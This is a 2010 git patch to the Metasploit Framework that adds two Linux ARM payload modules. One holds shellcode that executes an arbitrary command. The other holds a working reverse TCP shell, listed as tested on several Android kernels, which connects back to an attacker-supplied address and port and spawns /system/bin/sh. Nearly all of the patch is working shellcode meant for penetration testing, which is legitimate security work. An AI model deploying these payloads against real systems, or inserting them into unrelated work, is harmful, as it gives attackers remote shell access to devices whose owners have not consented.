From 2d14c0054f234f42bc1b8b81a53d1034af989512 Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Wed, 25 Aug 2010 21:44:33 +0000
Subject: [PATCH] add two contributed linux armle payloads, thx guys!

git-svn-id: file:///home/svn/framework3/trunk@10152 4d416f70-5f16-0410-b530-b9f4589650da
---
 data/templates/src/elf/exe/elf_x86_template.s |   2 +-
 modules/payloads/singles/linux/armle/exec.rb  |  52 ++++++
 .../singles/linux/armle/shell_reverse_tcp.rb  | 155 ++++++++++++++++++
 3 files changed, 208 insertions(+), 1 deletion(-)
 create mode 100644 modules/payloads/singles/linux/armle/exec.rb
 create mode 100644 modules/payloads/singles/linux/armle/shell_reverse_tcp.rb

diff --git a/data/templates/src/elf/exe/elf_x86_template.s b/data/templates/src/elf/exe/elf_x86_template.s
index 9477730d67..b3059a228b 100644
--- a/data/templates/src/elf/exe/elf_x86_template.s
+++ b/data/templates/src/elf/exe/elf_x86_template.s
@@ -1,5 +1,5 @@
 ; build with:
-;   nasm elf_template.s -f bin -o template_x86_linux.bin
+;   nasm elf_x86_template.s -f bin -o template_x86_linux.bin
 
 BITS 32
 
diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb
new file mode 100644
index 0000000000..270abe4bde
--- /dev/null
+++ b/modules/payloads/singles/linux/armle/exec.rb
@@ -0,0 +1,52 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+###
+#
+# Exec
+# ----
+#
+# Executes an arbitrary command.
+#
+###
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Linux Execute Command',
+			'Version'       => '$Revision$',
+			'Description'   => 'Execute an arbitrary command',
+			'Author'        => 'Jonathan Salwan',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_ARMLE))
+
+		register_options(
+			[
+				OptString.new('CMD',  [ true,  "The command string to execute" ]),
+			], self.class)
+	end
+
+	def generate_stage
+		cmd     = datastore['CMD'] || ''
+		
+		payload = 
+			"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0a\x30" +
+			"\x01\x90\x01\xa9\x92\x1a\x0b\x27\x01\xdf" + cmd
+
+	end
+
+end
diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
new file mode 100644
index 0000000000..f8ce7b4c63
--- /dev/null
+++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
@@ -0,0 +1,155 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Linux
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Linux Command Shell, Reverse TCP Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Connect back to attacker and spawn a command shell',
+			'Author'        => 'civ',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_ARMLE,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'LHOST'    => [ 172, 'ADDR' ],
+							'LPORT'    => [ 170, 'n' ],
+						},
+					'Payload' =>
+						[
+							#### Tested successfully on:
+							# Linux 2.6.29.6-cm42 armv6l
+							# Linux 2.6.29.6-cyanogenmod armv6l
+							# Linux version 2.6.25-00350-g40fff9a armv5l
+							# Linux version 2.6.27-00110-g132305e armv5l
+							# Linux version 2.6.29-00177-g24ee4d2 armv5l
+							# Linux version 2.6.29-00255-g7ca5167 armv5l
+							# 
+							# Probably requires process to have INTERNET permission
+							# or root. 
+							####
+							# socket(2,1,6)
+							0xe3a00002,       # mov     r0, #2  ; 0x2
+							0xe3a01001,       # mov     r1, #1  ; 0x1
+							0xe2812005,       # add     r2, r1, #5      ; 0x5
+							0xe3a0708c,       # mov     r7, #140        ; 0x8c
+							0xe287708d,       # add     r7, r7, #141    ; 0x8d
+							0xef000000,       # svc     0x00000000
+							
+							# connect(soc, socaddr, 0x10)	
+							0xe1a06000,       # mov     r6, r0
+							0xe28f1084,       # 1dr     r1, pc, #132  ; 0x84
+							0xe3a02010,       # mov     r2, #16 ; 0x10
+							0xe3a0708d,       # mov     r7, #141        ; 0x8d
+							0xe287708e,       # add     r7, r7, #142    ; 0x8e
+							0xef000000,       # svc     0x00000000
+
+							# dup2(soc,0) @stdin
+							0xe1a00006,       # mov     r0, r6
+							0xe3a01000,       # mov     r1, #0  ; 0x0
+							0xe3a0703f,       # mov     r7, #63 ; 0x3f
+							0xef000000,       # svc     0x00000000
+
+							# dup2(soc,1) @stdout
+							0xe1a00006,       # mov     r0, r6
+							0xe3a01001,       # mov     r1, #1  ; 0x1
+							0xe3a0703f,       # mov     r7, #63 ; 0x3f
+							0xef000000,       # svc     0x00000000
+
+							# dup2(soc,2) @stderr
+							0xe1a00006,       # mov     r0, r6
+							0xe3a01002,       # mov     r1, #2  ; 0x2
+							0xe3a0703f,       # mov     r7, #63 ; 0x3f
+							0xef000000,       # svc     0x00000000
+
+							# execve("/system/bin/sh", args, env)
+							# Shrink me here. I am lame. 
+							0xe28f0048,       # add     r0, pc, #72     ; 0x48
+							0xe0244004,       # eor     r4, r4, r4
+							0xe92d0010,       # push    {r4}
+							0xe1a0200d,       # mov     r2, sp
+							0xe92d0004,       # push    {r2}
+							0xe1a0200d,       # mov     r2, sp
+							0xe92d0010,       # push    {r4}
+							0xe59f1048,       # ldr     r1, [pc, #72]   ; 8124 <env+0x8>
+							0xe92d0002,       # push    {r1}
+							0xe92d2000,       # push    {sp}
+							0xe1a0100d,       # mov     r1, sp
+							0xe92d0004,       # push    {r2}
+							0xe1a0200d,       # mov     r2, sp
+							0xe3a0700b,       # mov     r7, #11 ; 0xb
+							0xef000000,       # svc     0x00000000
+
+							# exit(0)
+							0xe3a00000,       # mov     r0, #0  ; 0x0
+							0xe3a07001,       # mov     r7, #1  ; 0x1
+							0xef000000,       # svc     0x00000000
+
+							# <af>:
+							# port offset = 170, ip offset = 172
+							0x04290002,       # .word   0x5c110002 @ port: 4444 , sin_fam = 2
+							0x0101a8c0,       # .word   0x0101a8c0 @ ip: 192.168.1.1
+							# <shell>:
+							0x00000000,       # .word   0x00000000 ; the shell goes here!
+							0x00000000,       # .word   0x00000000
+							0x00000000,       # .word   0x00000000
+							0x00000000,       # .word   0x00000000
+							# <arg>:
+							0x00000000        # .word   0x00000000 ; the args!
+
+						].pack("V*")
+				}
+			))
+
+		# Register command execution options
+		register_options(
+			[
+				OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
+				OptString.new('SHELLARG', [ false, "The argument to pass to the shell.", "-C" ])
+			], self.class)
+	end
+	
+	def generate
+		p = super
+		
+		sh = datastore['SHELL']
+		if sh.length >= 16
+			raise ArgumentError, "The specified shell must be less than 16 bytes."
+		end
+		p[176, sh.length] = sh
+		
+		arg = datastore['SHELLARG']
+		if arg
+			if arg.length >= 4
+				raise ArgumentError, "The specified shell argument must be less than 4 bytes."
+			end
+			p[192, arg.length] = arg
+		end
+
+		p
+	end
+
+end